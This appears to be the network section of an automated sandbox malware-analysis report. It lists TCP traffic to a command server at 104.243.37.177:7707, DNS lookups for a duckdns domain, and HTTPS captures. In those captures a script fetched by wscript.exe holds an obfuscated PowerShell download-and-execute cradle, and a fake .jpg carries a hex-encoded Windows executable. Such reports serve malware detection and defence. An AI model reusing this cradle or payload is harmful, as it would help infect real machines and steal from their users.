                                    Aug 29, 2024 19:44:25.713887930 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:25.795598030 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:25.796941042 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:25.802108049 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:25.802356005 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:25.807214975 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:32.226743937 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:32.235905886 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:32.235953093 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:32.242918015 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:32.386388063 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:32.431041956 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:32.516313076 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:32.517931938 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:32.523102045 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:32.523169041 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:32.529988050 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:35.024382114 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:35.029736996 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:35.029856920 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:35.035371065 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:35.162587881 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:35.212546110 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:35.291465044 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:35.297904968 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:35.303576946 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:35.304470062 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:35.312434912 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:41.805910110 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:41.810882092 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:41.814109087 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:41.818967104 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:42.018407106 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:42.069917917 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:42.147947073 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:42.149811029 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:42.155117989 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:42.155164957 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:42.160100937 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:48.122922897 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:48.128042936 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:48.128082991 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:48.132946968 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:48.266242981 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:48.319952011 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:48.395524979 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:48.444931984 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:48.536099911 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:48.541090965 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:48.541155100 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:48.546118975 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:54.914145947 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:55.088411093 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:55.092076063 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:55.098640919 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:55.221604109 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:55.275923967 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:55.309998035 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:55.313473940 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:55.318305969 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:44:55.318432093 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:44:55.323261023 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:01.711203098 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:01.716418982 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:01.720010042 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:01.724916935 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:01.934732914 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:01.976208925 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:02.065278053 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:02.067522049 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:02.072609901 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:02.072653055 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:02.078535080 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:08.528511047 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:08.533518076 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:08.533596992 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:08.538731098 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:08.664808989 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:08.710598946 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:08.799509048 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:08.800844908 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:08.805594921 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:08.805670977 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:08.810745001 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:15.304738998 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:15.309792042 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:15.309859037 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:15.314862967 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:15.527471066 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:15.570111036 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:15.659451008 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:15.663254023 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:15.668071032 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:15.670017958 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:15.674861908 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:21.665982008 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:21.673480988 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:21.673547029 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:21.681027889 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:21.825385094 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:21.866873980 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:21.955671072 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:21.957031012 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:21.961961985 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:21.962074041 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:21.966901064 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:24.867378950 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:24.981023073 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:24.981076956 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:24.986166954 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:25.149626017 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:25.195987940 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:25.283454895 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:25.285974979 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:25.290760040 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:25.292042971 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:25.296823978 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:31.648765087 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:31.653633118 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:31.653745890 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:31.658524036 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:31.796897888 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:31.853984118 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:31.927448988 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:31.931413889 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:31.936577082 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:31.938044071 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:31.943299055 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:38.445549965 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:38.450499058 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:38.450556040 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:38.455318928 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:38.665927887 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:38.710647106 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:38.799335003 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:38.801681995 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:38.806653976 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:38.806746006 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:38.811527014 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:45.230004072 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:45.234966993 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:45.242000103 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:45.246860027 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:45.426471949 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:45.478002071 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:45.556924105 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:45.558517933 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:45.563378096 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:45.563448906 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:45.570482016 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:47.601998091 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:47.610774994 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:47.610877991 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:47.619524956 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:47.793313980 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:47.835658073 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:47.928127050 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:47.929995060 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:47.934916019 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:47.935029030 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:47.939851046 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:54.383671999 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:54.388883114 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:54.388936996 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:54.393939972 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:54.612653017 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:54.663814068 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:54.743453026 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:54.744755983 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:54.749577999 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:45:54.749646902 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:45:54.754410028 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:46:02.820528030 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:46:02.826654911 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:46:02.826709032 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:46:02.832781076 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:46:03.005271912 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:46:03.054441929 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:46:03.131629944 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:46:03.132226944 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:46:03.137485027 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:46:03.137541056 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:46:03.142570019 CEST770749738104.243.37.177192.168.2.4

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 29, 2024 19:41:53.429578066 CEST5057653192.168.2.41.1.1.1
                                    Aug 29, 2024 19:41:53.665563107 CEST53505761.1.1.1192.168.2.4
                                    Aug 29, 2024 19:42:19.618921041 CEST5167153192.168.2.41.1.1.1
                                    Aug 29, 2024 19:42:20.246540070 CEST53516711.1.1.1192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Aug 29, 2024 19:41:53.429578066 CEST192.168.2.41.1.1.10xbf90Standard query (0)afclifescience-tiurma.comA (IP address)IN (0x0001)false
                                    Aug 29, 2024 19:42:19.618921041 CEST192.168.2.41.1.1.10x3b5eStandard query (0)kareemovic11.duckdns.orgA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Aug 29, 2024 19:41:53.665563107 CEST1.1.1.1192.168.2.40xbf90No error (0)afclifescience-tiurma.com192.185.141.13A (IP address)IN (0x0001)false
                                    Aug 29, 2024 19:42:20.246540070 CEST1.1.1.1192.168.2.40x3b5eNo error (0)kareemovic11.duckdns.org104.243.37.177A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • afclifescience-tiurma.com

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449730192.185.141.134436216C:\Windows\System32\wscript.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-29 17:41:54 UTC312OUTGET /jxs.txt HTTP/1.1
                                    Accept: */*
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: afclifescience-tiurma.com
                                    Connection: Keep-Alive
                                    2024-08-29 17:41:54 UTC278INHTTP/1.1 200 OK
                                    Date: Thu, 29 Aug 2024 17:41:54 GMT
                                    Server: nginx/1.23.4
                                    Content-Type: text/plain
                                    Content-Length: 526
                                    Last-Modified: Tue, 27 Aug 2024 17:37:43 GMT
                                    Accept-Ranges: bytes
                                    Vary: Accept-Encoding
                                    X-Server-Cache: true
                                    X-Proxy-Cache: MISS
                                    Connection: close
                                    2024-08-29 17:41:54 UTC526INData Raw: 0d 0a 44 69 6d 20 6f 64 71 65 6f 28 35 29 2c 20 71 51 73 78 59 2c 20 69 0d 0a 0d 0a 27 20 31 31 31 31 31 31 31 0d 0a 6f 64 71 65 6f 28 30 29 20 3d 20 22 5b 42 59 54 65 5b 5d 5d 3b 24 41 31 32 33 3d 27 49 65 58 28 4e 65 57 2d 4f 42 4a 65 43 54 20 4e 65 54 2e 57 27 3b 24 42 22 0d 0a 6f 64 71 65 6f 28 31 29 20 3d 20 22 34 35 36 3d 27 65 42 43 4c 49 65 4e 54 29 2e 44 4f 57 4e 4c 4f 27 3b 5b 42 59 54 65 5b 5d 5d 3b 24 43 37 38 39 3d 27 2d 22 0d 0a 6f 64 71 65 6f 28 32 29 20 3d 20 22 40 2d 40 2d 40 2d 24 2d 25 5e 28 27 27 68 74 74 70 73 3a 2f 2f 61 66 63 6c 69 66 65 73 63 69 65 6e 63 65 2d 74 69 75 72 6d 61 2e 22 0d 0a 6f 64 71 65 6f 28 33 29 20 3d 20 22 63 6f 6d 2f 72 6b 65 6d 2e 6a 70 67 27 27 29 27 2e 52 65 50 4c 41 43 65 28 27 2d 40 2d 40 2d 40 2d 24 2d 25
                                    Data Ascii: Dim odqeo(5), qQsxY, i' 1111111odqeo(0) = "[BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B"odqeo(1) = "456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-"odqeo(2) = "@-@-@-$-%^(''https://afclifescience-tiurma."odqeo(3) = "com/rkem.jpg'')'.RePLACe('-@-@-@-$-%


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.449731192.185.141.134431344C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-29 17:41:57 UTC83OUTGET /rkem.jpg HTTP/1.1
                                    Host: afclifescience-tiurma.com
                                    Connection: Keep-Alive
                                    2024-08-29 17:41:57 UTC228INHTTP/1.1 200 OK
                                    Date: Thu, 29 Aug 2024 17:41:57 GMT
                                    Server: Apache
                                    Upgrade: h2,h2c
                                    Connection: Upgrade
                                    Last-Modified: Tue, 27 Aug 2024 17:35:04 GMT
                                    Accept-Ranges: bytes
                                    Content-Length: 723642
                                    Content-Type: image/jpeg
                                    2024-08-29 17:41:57 UTC7964INData Raw: 24 43 6f 6e 74 65 6e 74 20 3d 20 40 27 0d 0a 0d 0a 0d 0a 24 4d 6f 72 64 65 78 73 74 72 69 6e 67 5f 6f 6a 6a 20 3d 20 22 34 44 25 26 25 35 41 25 26 25 39 30 25 26 25 30 30 25 26 25 30 33 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 46 46 25 26 25 46 46 25 26 25 30 30 25 26 25 30 30 25 26 25 42 38 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 34 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25
                                    Data Ascii: $Content = @'$Mordexstring_ojj = "4D%&%5A%&%90%&%00%&%03%&%00%&%00%&%00%&%04%&%00%&%00%&%00%&%FF%&%FF%&%00%&%00%&%B8%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%40%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 30 30 25 26 25 30 41 25 26 25 46 45 25 26 25 30 34 25 26 25 32 41 25 26 25 32 32 25 26 25 30 32 25 26 25 31 35 25 26 25 37 44 25 26 25 34 34 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 32 41 25 26 25 35 36 25 26 25 30 32 25 26 25 32 38 25 26 25 31 42 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26 25 30 32 25 26 25 30 33 25 26 25 37 44 25 26 25 34 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 30 32 25 26 25 30 34 25 26 25 37 44 25 26 25 34 35 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 32 41 25 26 25 33 32 25 26 25 30 32 25 26 25 37 42 25 26 25 34 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 36 46 25 26 25 39 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 32 41 25 26 25 34 45 25 26 25 30 32 25 26
                                    Data Ascii: %00%&%0A%&%FE%&%04%&%2A%&%22%&%02%&%15%&%7D%&%44%&%00%&%00%&%04%&%2A%&%56%&%02%&%28%&%1B%&%00%&%00%&%0A%&%02%&%03%&%7D%&%46%&%00%&%00%&%04%&%02%&%04%&%7D%&%45%&%00%&%00%&%04%&%2A%&%32%&%02%&%7B%&%46%&%00%&%00%&%04%&%6F%&%96%&%00%&%00%&%06%&%2A%&%4E%&%02%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 31 34 25 26 25 38 30 25 26 25 31 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 37 32 25 26 25 38 30 25 26 25 32 31 25 26 25 30 30 25 26 25 37 30 25 26 25 38 30 25 26 25 31 32 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 37 32 25 26 25 38 34 25 26 25 32 31 25 26 25 30 30 25 26 25 37 30 25 26 25 38 30 25 26 25 31 33 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 32 41 25 26 25 30 30 25 26 25 31 42 25 26 25 33 30 25 26 25 30 37 25 26 25 30 30 25 26 25 46 31 25 26 25 30 32 25 26 25 30 30 25 26 25 30 30 25 26 25 30 33 25 26 25 30 30 25 26 25 30 30 25 26 25 31 31 25 26 25 31 38 25 26 25 31 37 25 26 25 31 43 25 26 25 37 33 25 26 25 32 35 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26
                                    Data Ascii: %00%&%00%&%04%&%14%&%80%&%11%&%00%&%00%&%04%&%72%&%80%&%21%&%00%&%70%&%80%&%12%&%00%&%00%&%04%&%72%&%84%&%21%&%00%&%70%&%80%&%13%&%00%&%00%&%04%&%2A%&%00%&%1B%&%30%&%07%&%00%&%F1%&%02%&%00%&%00%&%03%&%00%&%00%&%11%&%18%&%17%&%1C%&%73%&%25%&%00%&%00%&%0A%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 36 41 25 26 25 36 46 25 26 25 35 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26 25 32 30 25 26 25 35 30 25 26 25 43 33 25 26 25 30 30 25 26 25 30 30 25 26 25 38 44 25 26 25 34 38 25 26 25 30 30 25 26 25 30 30 25 26 25 30 31 25 26 25 31 33 25 26 25 30 35 25 26 25 33 38 25 26 25 32 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 32 38 25 26 25 30 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 31 35 25 26 25 31 37 25 26 25 36 46 25 26 25 34 45 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26 25 32 36 25 26 25 32 38 25 26 25 30 38 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 31 31 25 26 25 30 35 25 26 25 31 36 25 26 25 31 31 25 26 25 30 34 25 26 25 36 46 25 26 25 34 46 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26
                                    Data Ascii: %6A%&%6F%&%51%&%00%&%00%&%0A%&%20%&%50%&%C3%&%00%&%00%&%8D%&%48%&%00%&%00%&%01%&%13%&%05%&%38%&%26%&%00%&%00%&%00%&%28%&%06%&%00%&%00%&%06%&%15%&%17%&%6F%&%4E%&%00%&%00%&%0A%&%26%&%28%&%08%&%00%&%00%&%06%&%11%&%05%&%16%&%11%&%04%&%6F%&%4F%&%00%&%00%&%0A%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 32 25 26 25 30 30 25 26 25 31 32 25 26 25 30 30 25 26 25 42 39 25 26 25 43 42 25 26 25 30 30 25 26 25 30 44 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 32 25 26 25 30 30 25 26 25 30 42 25 26 25 30 30 25 26 25 44 32 25 26 25 44 44 25 26 25 30 30 25 26 25 30 44 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 45 46 25 26 25 45 46 25 26 25 30 30 25 26 25 30 36 25 26 25 30 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 31 25 26 25 31 42 25 26 25 33 30 25 26 25 30 32 25 26 25 30 30 25 26 25 32 35 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 39 25 26 25 30 30 25 26 25 30 30 25 26 25 31 31 25 26
                                    Data Ascii: %00%&%00%&%00%&%02%&%00%&%12%&%00%&%B9%&%CB%&%00%&%0D%&%00%&%00%&%00%&%00%&%02%&%00%&%0B%&%00%&%D2%&%DD%&%00%&%0D%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%EF%&%EF%&%00%&%06%&%01%&%00%&%00%&%01%&%1B%&%30%&%02%&%00%&%25%&%00%&%00%&%00%&%09%&%00%&%00%&%11%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 37 32 25 26 25 37 46 25 26 25 33 30 25 26 25 30 30 25 26 25 37 30 25 26 25 36 46 25 26 25 42 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 31 37 25 26 25 38 30 25 26 25 32 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 33 38 25 26 25 31 35 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 37 32 25 26 25 39 44 25 26 25 33 30 25 26 25 30 30 25 26 25 37 30 25 26 25 36 46 25 26 25 41 34 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 37 32 25 26 25 35 31 25 26 25 32 35 25 26 25 30 30 25 26 25 37 30 25 26 25 36 46 25 26 25 42 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 37 45 25 26 25 31 46 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 37 32 25 26
